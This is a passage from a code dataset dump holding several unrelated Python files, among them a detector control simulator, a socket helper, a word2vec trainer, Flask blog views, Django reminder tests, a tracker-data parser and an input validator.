start_reactor(self):\n self._log.debug(\"Starting reactor...\")\n self._reactor.run()\n\n def handle_ctrl_msg(self):\n id = self._ctrl_channel.recv()\n msg = LATRDMessage.parse_json(self._ctrl_channel.recv())\n\n self._log.debug(\"Received message ID[%s]: %s\", id, msg)\n if isinstance(msg, GetMessage):\n self._log.debug(\"Received GetMessage, parsing...\")\n self.parse_get_msg(msg, id)\n elif isinstance(msg, PutMessage):\n self._log.debug(\"Received PutMessage, parsing...\")\n self.parse_put_msg(msg)\n elif isinstance(msg, PostMessage):\n self._log.debug(\"Received PostMessage, parsing...\")\n self.parse_post_msg(msg)\n else:\n raise LATRDMessageException(\"Unknown message type received\")\n\n def parse_get_msg(self, msg, send_id):\n # Check the parameter keys and retrieve the values from the store\n values = {}\n self.read_parameters(self._store, msg.params, values)\n self._log.debug(\"Return value object: %s\", values)\n reply = ResponseMessage(msg.msg_id, values, ResponseMessage.RESPONSE_OK)\n self._ctrl_channel.send_multi([send_id, reply])\n\n def parse_put_msg(self, msg):\n # Retrieve the parameters and merge them with the store\n params = msg.params\n for key in params:\n self.apply_parameters(self._store, key, params[key])\n self._log.debug(\"Updated parameter Store: %s\", self._store)\n reply = ResponseMessage(msg.msg_id)\n self._ctrl_channel.send(reply)\n\n def parse_post_msg(self, msg):\n # Nothing to do here, just wait two seconds before replying\n time.sleep(2.0)\n # Check for the \"Run\" command. If it is sent and the simulated script has been supplied then execute it\n\n reply = ResponseMessage(msg.msg_id)\n self._ctrl_channel.send(reply)\n\n def apply_parameters(self, store, key, param):\n if key not in store:\n store[key] = param\n else:\n if isinstance(param, dict):\n for new_key in param:\n self.apply_parameters(store[key], new_key, param[new_key])\n else:\n store[key] = param\n\n def read_parameters(self, store, param, values):\n self._log.debug(\"Params: %s\", param)\n for key in param:\n if isinstance(param[key], dict):\n values[key] = {}\n self.read_parameters(store[key], param[key], values[key])\n else:\n values[key] = store[key]\n\n\ndef options():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--control\", default=\"tcp://127.0.0.1:7001\", help=\"Control endpoint\")\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = options()\n\n simulator = LATRDControlSimulator()\n simulator.setup_control_channel(args.control)\n simulator.start_reactor()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"control/latrd/detector/control_simulator.py","file_name":"control_simulator.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"26578639","text":"import io\nimport json\nimport struct\nimport sys\nimport socket\n\n\"\"\"\nA CHAS implementation of the Python Socket.\nThe CHAS socket handles all low-level read/write operations,\nAnd includes support for CHAS device objects.\n\"\"\"\n\n\nclass CHASocket:\n\n def __init__(self, selector, sock, addr, log):\n\n self.sel = selector # Selector object\n self.sock = sock # Socket object\n self.addr = addr # Address of client\n self._jsonheader_len = None # Length of JSON header\n self._jsonheader = None # Decoded JSON header\n self.content = None # Decoded content of the response\n self.__dev = None # UUID of device socket is binded to, allows for high level CHAS socket management\n\n self.log = log\n\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 32000)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 32000)\n self.sock.settimeout(5)\n\n def _read(self, byts):\n\n # Read a specified amount of bytes\n\n data = b''\n orig = int(byts)\n\n while True:\n\n try:\n\n data = data + self.sock.recv(byts)\n\n except BlockingIOError:\n\n # Resource temporarily unavailable!\n\n self.log.info(\"Socket temporarily unavailable!\")\n\n finally:\n\n # Check how many bytes we have read - Prevents Socket Drift:\n\n byts = orig - len(data)\n\n if len(data) == orig:\n\n # We are done lets break:\n\n break\n\n return data\n\n def read(self):\n\n if self._jsonheader_len is None:\n\n self._process_proto_header()\n\n if self._jsonheader_len is not None:\n\n if self._jsonheader is None:\n\n self._process_jsonheader()\n\n if self._jsonheader:\n\n if self.content is None:\n\n return self._process_request()\n\n self._read(50)\n\n return None\n\n def _write(self, content_bytes):\n\n # Write data to the stream\n\n self.sock.sendall(content_bytes)\n\n return\n\n def write(self, content, encoding='utf-8'):\n\n # Encoding data and sending data\n\n encoded = self._json_encode(content)\n\n message = self._create_message(encoded, 'text', encoding)\n\n self._write(message)\n\n def _json_encode(self, mesg, encoding=\"utf-8\"):\n\n # Encode message in JSON\n\n return json.dumps(mesg, ensure_ascii=False).encode(encoding)\n\n def _json_decode(self, json_bytes, encoding=\"utf-8\"):\n\n # Decode message in JSON\n\n try:\n\n tiow = io.TextIOWrapper(\n io.BytesIO(json_bytes), encoding=encoding, newline=\"\"\n )\n\n obj = json.load(tiow)\n tiow.close()\n\n return obj\n\n except Exception as e:\n\n self.log.error(\"Error while decoding: {}\".format(json_bytes))\n\n def _process_proto_header(self):\n\n # Method for processing proto header\n\n hdrlen = 2\n\n content = self._read(2)\n\n if len(content) == hdrlen:\n\n self._jsonheader_len = struct.unpack(\n \">H\", content\n )[0]\n\n return\n\n def _process_jsonheader(self):\n\n hdrlen = self._jsonheader_len\n\n content = self._read(hdrlen)\n\n if len(content) == hdrlen:\n\n self._jsonheader = self._json_decode(\n content, encoding=\"utf-8\"\n )\n\n for reqhd in (\n \"byteorder\",\n \"content-length\",\n \"content-type\",\n \"content-encoding\",\n ):\n\n if reqhd not in self._jsonheader:\n\n raise Exception(\"Malformed JSON Header!\")\n\n return\n\n def _process_request(self):\n\n # Method for processing the request\n\n content_len = self._jsonheader[\"content-length\"]\n\n contents = self._read(content_len)\n\n encoding = self._jsonheader[\"content-encoding\"]\n\n content = self._json_decode(contents, encoding=encoding)\n\n self._jsonheader = None\n self._jsonheader_len = None\n\n return content\n\n def _create_message(self, content_bytes, content_type, content_encoding):\n\n # Method for creating message:\n\n header = {\"byteorder\": sys.byteorder,\n \"content-type\": content_type,\n \"content-encoding\": content_encoding,\n \"content-length\": len(content_bytes)}\n\n header_bytes = self._json_encode(header)\n\n proto_header = struct.pack(\">H\", len(header_bytes))\n\n message = proto_header + header_bytes + content_bytes\n\n return message\n\n @property\n def device_uuid(self):\n \n return self.__dev\n\n def bind(self, uuid):\n\n # Binds a device UUID to the socket, ensures CHAS Socket security,\n # And allows for higher level CHAS socket operations.\n # This action is permanent for all CHAS socket instances.\n\n if self.__dev is not None:\n\n # Ignoring attempted binding attempt, already binded\n\n return\n\n self.__dev = uuid\n \n return\n\n def close(self):\n\n # Method for closing the websocket\n\n print(f\"Closing connection to: {self.addr}\")\n\n try:\n\n self.sel.unregister(self.sock)\n\n except Exception as e:\n\n print(f\"Error unregistering socket: {e}\")\n\n try:\n\n self.sock.close()\n\n except Exception as e:\n\n print(f\"Error closing socket: {e}\")\n\n finally:\n\n self.sock = None\n","sub_path":"chas/server/chaslib/socket_lib.py","file_name":"socket_lib.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"389652660","text":"import logging\nfrom gensim.models import word2vec\nimport re\n\n\ndef read_data(data_path):\n\twith open(data_path, \"r\") as f:\n\t\tsentences = []\n\t\tfor i, line in enumerate(f):\n\t\t\tsentences.append(line.strip().split())\n\treturn sentences\n\nif __name__ == \"__main__\":\n\tsentences = read_data(\"../data/IMDB.train.corpus\")\n\t\n\t#logging\n\tlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n \t\n\t#train word vectors\n\tmodel = word2vec.Word2Vec(sentences, size=32, min_count = 3, workers = 24, window = 10, sg = 0) # CBOW\n \n\t#store the model\n\tmodel.save('../models/word2vec.mod')\n\n","sub_path":"src/train_word2vec.py","file_name":"train_word2vec.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"233360470","text":"from flask import render_template, redirect, url_for, request\nfrom main import db\nfrom main import app\nfrom models import BlogPost\n\n\n@app.route('/')\ndef all_posts():\n return render_template('log_post.html')\n\n@app.route('/posts/')\ndef show_post(id):\n post = BlogPost.query.get(id)\n return render_template('post.html', post=post)\n\n@app.route('/posts/new')\ndef new_post():\n return render_template('new_post.html')\n\n@app.route('/posts/del')\ndef del_post():\n #post = BlogPost.query.get(id)\n #db.session.delete(post)\n #db.session.commit()\n return render_template('del_post.html')\n\n\n@app.route('/posts/delete',methods=['POST'])\ndef delete_post():\n flag=0\n title=request.form.get('title',None)\n all_posts = BlogPost.query.all()\n for post in all_posts:\n if title==post.title:\n db.session.delete(post)\n db.session.commit() \n flag=1\n if flag:\n return render_template('del1_post.html')\n else:\n return render_template('nodelet_post.html') \n\n@app.route('/posts/search3')\ndef search3_post():\n return render_template('search2_post.html')\n\n@app.route('/posts/search',methods=['POST'])\ndef search1_post():\n title=request.form.get('title',None)\n all_posts = BlogPost.query.all()\n for post in all_posts:\n if title==post.title:\n return redirect(url_for('show_post' ,id=post.id))\n return render_template('error_post.html') \n \n \n@app.route('/edit/')\ndef edit_post(id):\n post = BlogPost.query.get(id)\n db.session.delete(post)\n db.session.commit()\n return redirect(url_for('new_post'))\n\n@app.route('/posts/register',methods=['POST'])\ndef login_post():\n title=request.form.get('title',None)\n content=request.form.get('content', None)\n all_posts=BlogPost.query.all()\n flag1=0\n flag2=0\n for post in all_posts:\n if title==post.title:\n flag1=1\n if content==post.content:\n flag2=1\n if flag1 and flag2: \n return render_template('register_yes.html')\n elif flag1:\n return render_template('log_post.html',error='the password is worry!!!')\n else :\n return render_template('log_post.html',error='the user is inexistence!!!')\n \n \n@app.route('/posts/add', methods=['POST'])\ndef add_post():\n title = request.form.get('title', None)\n content = request.form.get('content', None)\n if title and content:\n if len(str(title))==10 and len(str(content))==6:\n BlogPost.create(title, content)\n return redirect(url_for('all_posts'))\n return render_template('new_post.html', error='Username and Password are required')\n\n\n\n\n\n\n\n\n","sub_path":"flask-sample1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"364690544","text":"from datetime import timedelta\nimport io\nfrom unittest import mock\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core import management\nfrom django.test import TestCase, override_settings\nfrom django.utils import timezone\n\nfrom glitter.models import Version\nfrom glitter.pages.models import Page\nfrom glitter.reminders import choices\nfrom glitter.reminders.models import Reminder\n\n\n@override_settings(\n ROOT_URLCONF='glitter.reminders.tests.urls',\n)\nclass ReminderManagementTestCase(TestCase):\n\n def setUp(self):\n self.user = User.objects.create_user(\n username='joe', password='qwerty', email='test@gmail.com'\n )\n self.stdout = io.StringIO()\n self.stderr = io.StringIO()\n\n def tearDown(self):\n self.stdout.close()\n self.stderr.close()\n\n def create_page_with_version(self, modified):\n self.page = Page.objects.create(url='/test/', title='Test page')\n with mock.patch('django.db.models.fields.DateTimeField.pre_save') as mock_pre_save:\n mock_pre_save.return_value = modified\n self.page_version = Version.objects.create(\n content_type=ContentType.objects.get_for_model(Page),\n object_id=self.page.id,\n template_name='glitter/sample.html',\n owner=self.user\n )\n self.page_version.generate_version()\n self.page.current_version = self.page_version\n self.page.current_version.modified = mock.Mock(\n return_value=timezone.now() - timedelta(days=16)\n )\n self.page.save()\n\n def create_reminder(self, interval, page):\n self.reminder = Reminder.objects.create(\n interval=interval,\n content_type=ContentType.objects.get_for_model(Page),\n object_id=self.page.id,\n user=self.user\n )\n\n def test_send_reminder(self):\n \"\"\" Send reminder in two weeks interal. \"\"\"\n # More then two weeks ago.\n modified_at = timezone.now() - timedelta(days=16)\n\n self.create_page_with_version(modified=modified_at)\n self.create_reminder(\n interval=choices.INTERVAL_2_WEEKS, page=self.page\n )\n self.reminder.sent_at = modified_at\n self.reminder.save()\n\n management.call_command('send_reminders', stdout=self.stdout, verbosity=3)\n command_output = self.stdout.getvalue().strip()\n\n self.assertEqual(\n command_output,\n 'Email for {} is sent to: {}'.format(\n self.reminder.content_object, self.reminder.user.email\n )\n )\n\n def test_not_send_reminder_next_day(self):\n \"\"\"\n Should not sent reminder if content updated 16 days ago but reminder was sent 1 day ago\n based on 2 weeks interval.\n \"\"\"\n modified_at = timezone.now() - timedelta(days=16)\n\n self.create_page_with_version(modified=modified_at)\n self.create_reminder(\n choices.INTERVAL_2_WEEKS, self.page\n )\n self.reminder.sent_at = timezone.now() - timedelta(days=1)\n self.reminder.save()\n\n self.stdout = io.StringIO()\n\n management.call_command('send_reminders', stdout=self.stdout, verbosity=3)\n\n command_output = self.stdout.getvalue().strip()\n self.assertEqual(\n command_output,\n 'Email for {} is not sent to: {}'.format(\n self.reminder.content_object, self.reminder.user.email\n )\n )\n\n def test_reminder_sent_at(self):\n \"\"\"\n Test if sent_at set 100 days ago and the content was modified 3 days ago based on 2 weeks\n interval.\n \"\"\"\n modified_at = timezone.now() - timedelta(days=3)\n\n self.create_page_with_version(modified=modified_at)\n self.create_reminder(choices.INTERVAL_2_WEEKS, self.page)\n\n self.reminder.sent_at = timezone.now() - timedelta(days=100)\n self.reminder.save()\n\n self.stdout = io.StringIO()\n management.call_command('send_reminders', stdout=self.stdout, verbosity=3)\n command_output = self.stdout.getvalue().strip()\n self.assertEqual(\n command_output,\n 'Email for {} is not sent to: {}'.format(\n self.reminder.content_object, self.reminder.user.email\n )\n )\n","sub_path":"glitter/tests/reminders/test_management.py","file_name":"test_management.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"289426720","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport matplotlib as mpl\nfrom scipy import stats\n\nmpl.rcParams[\"errorbar.capsize\"] = 2\n\nBIGGER_SIZE = 18\nplt.rc('font', size=BIGGER_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=BIGGER_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=BIGGER_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=BIGGER_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=BIGGER_SIZE)\n\ndef barplot_files(fnames, xlabels, yaxis):\n\n xdef = np.arange(0, len(xlabels))\n orig = [np.loadtxt(f) for f in fnames]\n data = []\n\n # outlier removal (Tukey)\n for d in orig:\n # outlier removal (Tukey, 1.5 param)\n d_25 = np.quantile(d, 0.25)\n iqr = stats.iqr(d)\n d_75 = np.quantile(d, 0.75)\n lower = d_25 - 1.5*iqr\n upper = d_75 + 1.5*iqr\n cdata = np.array([x for x in d if x > lower and x < upper])\n data.append(cdata)\n\n bars = [np.mean(x) for x in data]\n stddevs = [np.std(x) for x in data]\n\n fig, ax = plt.subplots(1, figsize=(7,7))\n\n ax.bar(xdef, bars, yerr=stddevs, width=0.3, color='rebeccapurple', edgecolor='black', linewidth=0.5, alpha=0.7)\n\n ax.set(xticklabels=xlabels)\n plt.xticks(xdef, rotation=30)\n plt.ylabel(yaxis)\n plt.tight_layout()\n plt.yscale('log')\n \n plt.savefig(\"parallel-constructs.pdf\")\n\n\n\nexps = [\"c_pt_parfor\", \"c_omp_parfor\", \"julia_parallel_for\", \"julia_pmap\"]\nfilenames = [\"data/thread-decomposition/\" + x + \".dat\" for x in exps]\nyaxis_title = \"Latency (ns)\"\n\nbarplot_files(filenames, [\"pthreads manual\", \"OMP parallel for\", \"Julia distributed\", \"Julia pmap()\"], yaxis_title)\n\n","sub_path":"plotting_and_reporting/parallel_constructs.py","file_name":"parallel_constructs.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"46948560","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 19 21:29:25 2017\n\n@author: Jordan\n\nParse Data from ART System .drf files, save to file\nInput is a regular ART .drf file, output is a csv file.\n\"\"\"\n\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport glob, os\n\n#%% Regular expression queries for validating intact ART data\n#filePath = '../data/body.drf'\n#filePath = '../data/elbowFlex1.drf'\n#fileName = re.findall('.*/(.+).drf',filePath)[0]\ndataLabelSearch = '([a-zA-Z0-9]+) .+' # RegEx Search string for the alphanum labels\ndataLabels=['fr','ts','6dcal','6d','6di','6df2','glcal','gl'] # Search string for alphanum labels\nregexFloat = '[a-z0-9]+ ([0-9.]+)' # Regex for the float values\nregexFloatInt = '-*[0-9]+\\.*[0-9]*' # Float or int values, postive or negative\nregexFloatInt2 = '-?[0-9]+\\.?[0-9]*' # Float or int values, postive or negative\nregexBodyObjects = '\\[.+?\\]\\[.+?\\]\\[.+?\\]' # Grab each body object\nregexNumObjects = '6di ([0-9]) ' # Number of objects tracked\nqueryDevice = '(?:(-?[0-9]+) ?)' # Query for integer Omron / IMU Device data\nquery6d = '((\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){2}\\])(\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){6}\\])(\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){9}\\]) ??)' # Grabs\nquery6di = '((\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){3}\\])(\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){3}\\])(\\[(?:(?:-??[0-9]+\\.??[0-9]*) ??){9}\\]) ??)' # 6di data\nqueryLineData = '\\[.*\\]' # All data in a line, starting and ending with []\nhandTrackerPointCt = 70 # Number of elements expected for hand tracker data\n\nprotoDataMinLength = 100 # Min Character length of proto data. Helps to reject the \"connected\" starter messages\nprotoNumEl = 29 # Num elements in proto line\nprotoMinEl = 26\n\n#%% Functions\ndef BodyPosition(query,string):\n # Search for position data and return as a list of float values\n BodyValues = re.findall(query,string) # Grab numbers\n BodyValues = [float(i) for i in BodyValues] # Convert to float\n position = BodyValues[3:6] # Grab position values\n return position\n\ndef BodyRotation(query,string):\n # Search for position data and return as a list of float values\n BodyValues = re.findall(query,string) # Grab numbers\n BodyValues = [float(i) for i in BodyValues] # Convert to float\n position = BodyValues[6:] # Grab position values\n return position\n#\n#def HandData(query,string):\n#\t# Search for hand data nad return list of float values\n\t\t\t\t\ndef parse(filePath): # Parse files\n\t# Parse ART and Proto data and return in arrays\n\tfile = open(filePath,'r') # Open file\n\t# Data Arrays\n\tdataLabel = []\n\tframe = []\n\ttime = []\n\tsixdcal = []\n\tNumObjects = -1\n\tpositions = []\n\trotations = []\n\thandTracker = []\n\tdeviceDatas = [] # Data from Omron / IMU Device\n\tfor line in file: # Process one line at a time\n\t\t\n\t\tif re.findall(dataLabelSearch,line):\n\t\t\tdataType = re.findall(dataLabelSearch,line)[0] # This is the data type label\n\t\t\tif dataType == dataLabels[0]: # frame number\n\t\t\t\taframe = re.findall(regexFloat,line)[0]\n\t\t\t\tframe.append(int(aframe))\n\t\t\telif dataType == dataLabels[1]: # time value\n\t\t\t\tatime = re.findall(regexFloat,line)[0]\n\t\t\t\ttime.append(float(atime))\n\t\t\telif dataType == dataLabels[2]: # 6d calibration data (number of tracked bodies)\n\t\t\t\tasixdcal = re.findall(regexFloat,line)[0]\n\t\t\t\tsixdcal.append(int(asixdcal))\t\n\t\t\telif dataType == dataLabels[3]: # 6d tracker data\n#\t\t\t\tprint('6d data instead of 6d inertial detected')\n\t\t\t\tpass\n\t\t\telif dataType == dataLabels[4]: # 6d inertial tracker data\n\t\t\t\tif NumObjects == -1: # Check for the number of tracked objects if it isn't known yet\n\t\t\t\t\tNumObjects = int(re.findall(regexNumObjects,line)[0]) # Find number of objects that were being tracked\t\t\t\t\n\t\t\t\t\tfor i in range(NumObjects): # Pre-allocate a list for positions, rotations of each body\n\t\t\t\t\t\tpositions.append([])\n\t\t\t\t\t\trotations.append([])\n\t\t\t\t\t\t\n\t\t\t\tBodyObjects = re.findall(regexBodyObjects,line) # Grab each of the tracked bodies\n\t\t\t\tfor i,body in enumerate(BodyObjects):\n\t\t\t\t\tposition = BodyPosition(regexFloatInt,body) # Grab the position\n\t\t\t\t\tpositions[i].append(position) # Append to appropriate list\t\n\t\t\t\t\trotation = BodyRotation(regexFloatInt,body) # Grab rotation data\n\t\t\t\t\trotations[i].append(rotation) # Append to appropriate list\t\n\t\t\telif dataType == dataLabels[7] : # finger track 'gl' data\n\t\t\t\tif int(re.findall('gl ([0-9]).*',line)[0]) !=0: # Ensure that the line isn't actually empty\n\t\t\t\t\tlineData = re.findall(queryLineData,line)\n\t\t\t\t\thandValues = re.findall(regexFloatInt2,lineData[0])\n\t\t\t\t\thandValues = [float(i) for i in handValues]\n\t\t\t\t\thandTracker.append(handValues)\n\t\t\t\telse:\n\t\t\t\t\thandTracker.append([0 for i in range(handTrackerPointCt)])\n\t\t\telse: # This is likely a Omron IMU line\n\t\t\t\tif len(line) > protoDataMinLength: # This is probably a prototype data line if length is sufficient\n\t\t\t\t\t# Use RegEx to grab all elements\t\t\t\t\t\n\t\t\t\t\tdeviceData = re.findall(regexFloatInt,line)\n\t\t\t\t\t# If length is sufficient, write into list. Cast to int\n\t\t\t\t\tif len(deviceData) >= protoMinEl:\n\t\t\t\t\t\tdeviceData = [float(i) for i in deviceData]\n\t\t\t\t\t\tdeviceDatas.append(deviceData)\n\t\t\t\t\telse:\n\t\t\t\t\t\tdeviceDatas.append([0 for i in range(26)]) # Put an empty line in otherwise\n\t\t\t\telif len(line) > 40:\n\t\t\t\t\tdeviceDatas.append([0 for i in range(26)]) # Put an empty line in otherwise\n\treturn frame,time,sixdcal, positions, rotations, deviceDatas, handTracker\n\ndef joinProtoART(positions,rotations,deviceDatas,time,handTracker,fileName):\n\t# Unite ART and proto data into array for saving\n\t# Built to be extensible to the number of tracker objects present\n\t# Make a list to hold all available data in\n\tdata = []\n\t# Check for time values from ART System\n\tif time:\n\t\tdata.append(time)\n\t# Check for IR Device data\n\tif deviceDatas:\n\t\tdata.append(deviceDatas)\n\t# Check for position data from ART System\n\tif positions:\n\t\t[data.append(i) for i in positions]\n\t# Check for rotation data from ART System\n\tif rotations:\n\t\t[data.append(i) for i in rotations]\n\t# Check for hand tracker data from ART System\n\tif handTracker:\n\t\tdata.append(handTracker)\n\t\n\t# Check that data arrays are equal length\n\tlengths = []\n\tfor i in data:\n\t\tlengths.append(len(i))\n\t# If lengths array has length 1, we likely have Omron Data\n\tif len(lengths) == 1:\n\t\tdataArray = np.array(data[0])\n\t# Otherwise, we should ART and proto data\n\telse:\n\t\n\t\tif lengths[1:] == lengths[:-1]:\n\t\t\tprint('All arrays are equal length')\n\t\t\tlengthsEqual = True\n\t\t\tnewData = data\n\t\telse:\n\t\t\tprint('Arrays are not equal in length')\n\t\t\tminLength = min(lengths)\n\t\t\tnewData = []\n\t\t\tfor i in data:\n\t\t\t\tnewData.append(i[:minLength])\n\t\t\tlengthsEqual = True\n\t\t\n\t\tif lengthsEqual:\n\t\t\tdataArray = np.array(newData[0]).reshape((len(newData[0]),1))# Put the time row in first\n\t\t\tfor i in range(1,len(newData)):\n\t#\t\t\tprint(np.array(newData[i]).shape)\n\t\t\t\tdataArray = np.hstack((dataArray,np.array(newData[i])))\n\t\t\t\t\t\n\tnp.savetxt(fileName+'.csv',dataArray, delimiter=',')\n\treturn dataArray\n\ndef parseSave(afile):\n\tfilePath = afile\n\tfileName = os.path.basename(afile)[:-4]\n\tframe,time,numBodies, positions, rotations, deviceDatas,handTracker = parse(filePath)\n\tdataArray = joinProtoART(positions,rotations,deviceDatas,time,handTracker,fileName)\n\tnp.savetxt(fileName+'.csv',dataArray, delimiter=',')\n\treturn\n","sub_path":"parseData.py","file_name":"parseData.py","file_ext":"py","file_size_in_byte":7188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"65705109","text":"\nfrom abc import ABCMeta, abstractmethod\nimport datetime\n\n# abstract factory\n\n\nclass AbstractChecker(metaclass=ABCMeta):\n \"\"\"AbstractChecker\"\"\"\n @abstractmethod\n def check(self, data):\n pass\n# singeton class inherit from AbstractChecker\n\n\nclass EmployeeIdChecker(object):\n\n class __EmployeeIdChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data.__len__() > 0:\n num_ascii = ord(input_data[0])\n if num_ascii > 64 and num_ascii < 91:\n int_digit = input_data[1::]\n if int_digit.isdigit() and int_digit.__len__() == 3:\n result = True\n else:\n result = False\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not EmployeeIdChecker.instance:\n EmployeeIdChecker.instance = EmployeeIdChecker.__EmployeeIdChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass GenderChecker(object):\n\n class __GenderChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data == 'M' or input_data == 'F':\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not GenderChecker.instance:\n GenderChecker.instance = GenderChecker.__GenderChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass AgeChecker(object):\n\n class __AgeChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data.isdigit() and input_data.__len__() == 2:\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not AgeChecker.instance:\n AgeChecker.instance = AgeChecker.__AgeChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass SalesChecker(object):\n\n class __SalesChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data.isdigit() and input_data.__len__() == 3:\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not SalesChecker.instance:\n SalesChecker.instance = SalesChecker.__SalesChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass BMIChecker(object):\n\n class __BMIChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n options = ['Normal', 'Overweight', 'Obesity', 'Underweight']\n if input_data in options:\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not BMIChecker.instance:\n BMIChecker.instance = BMIChecker.__BMIChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass SalaryChecker(object):\n\n class __SalaryChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n if input_data.isdigit() and input_data.__len__() >= 2 and input_data.__len__() <= 3:\n result = True\n else:\n result = False\n return result\n instance = None\n\n def __init__(self):\n if not SalaryChecker.instance:\n SalaryChecker.instance = SalaryChecker.__SalaryChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass BirthdayChecker(object):\n\n class __BirthdayChecker(AbstractChecker):\n\n def check(self, input_data):\n result = False\n try:\n if(datetime.datetime.strptime(input_data, '%d-%m-%Y')):\n date = datetime.datetime.strptime(input_data, '%d-%m-%Y')\n if(date.year > datetime.datetime.now().year):\n result = False\n else:\n result = True\n else:\n result = False\n return result\n except ValueError:\n return False\n instance = None\n\n def __init__(self):\n if not BirthdayChecker.instance:\n BirthdayChecker.instance = BirthdayChecker.__BirthdayChecker()\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n\n\nclass Validator(object):\n\n \"\"\"docstring for ClassName\"\"\"\n # def __init__(self):\n\n def is_valid_employee_id(self, input_data):\n checker = EmployeeIdChecker()\n return checker.check(input_data)\n\n def is_valid_gender(self, input_data):\n checker = GenderChecker()\n return checker.check(input_data)\n\n def is_valid_age(self, input_data):\n checker = AgeChecker()\n return checker.check(input_data)\n\n def is_valid_sales(self, input_data):\n checker = SalesChecker()\n return checker.check(input_data)\n\n def is_valid_BMI(self, input_data):\n checker = BMIChecker()\n return checker.check(input_data)\n\n def is_valid_salary(self, input_data):\n checker = SalaryChecker()\n return checker.check(input_data)\n\n def is_valid_birthday(self, input_data):\n checker = BirthdayChecker()\n return checker.check(input_data)\n\n def is_load_data(self, input_data):\n result = 0\n data = input_data.split(',')\n if(data.__len__() == 7):\n if(self.is_valid_employee_id(data[0])):\n result += 1\n if(self.is_valid_gender(data[1])):\n result += 1\n if(self.is_valid_age(data[2])):\n result += 1\n if(self.is_valid_sales(data[3])):\n result += 1\n if(self.is_valid_BMI(data[4])):\n result += 1\n if(self.is_valid_salary(data[5])):\n result += 1\n if(self.is_valid_birthday(data[6])):\n result += 1\n if(result == 7):\n return True\n else:\n return False\n","sub_path":"bad_smell_duplication/code/new_code/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"387226454","text":"import socket\nimport struct\nimport json\nimport os\n\nclass Socket:\n\tdef __init__(self, _globals):\n\t\tself.globals = _globals\n\t\tself.connected = False\n\t\tself.sock = None\n\n\t\tself.address = (\"127.0.0.1\", 5654)\n\n\tdef close(self):\n\t\ttry:\n\t\t\tself.sock.close()\n\t\texcept:\n\t\t\tpass\n\t\tself.sock = None\n\t\tself.connected = False\n\n\tdef connect(self):\n\t\tif self.connected:\n\t\t\treturn True\n\n\t\ttry:\n\t\t\tself.sock = socket.socket()\n\t\t\tself.sock.connect(self.address)\n\t\t\tself.connected = True\n\n\t\texcept:\n\t\t\tself.close()\n\t\t\treturn False\n\n\t\tsent = self.send({\n\t\t\t\"type\": \"handshake\",\n\t\t\t\"token\": os.getenv(\"FSOL_BOT_SOCKET_TOKEN\")\n\t\t})\n\t\tif sent:\n\t\t\trecv = self.recv()\n\n\t\t\tif recv[0] and recv[1][\"success\"]:\n\t\t\t\treturn True\n\n\t\tself.close()\n\t\treturn False\n\n\tdef send(self, data, *, recall=True):\n\t\tif self.connected:\n\t\t\ttry:\n\t\t\t\tpacket = json.dumps(data).encode()\n\t\t\t\tself.sock.send(struct.pack(\"!L\", len(packet)) + packet)\n\t\t\t\treturn 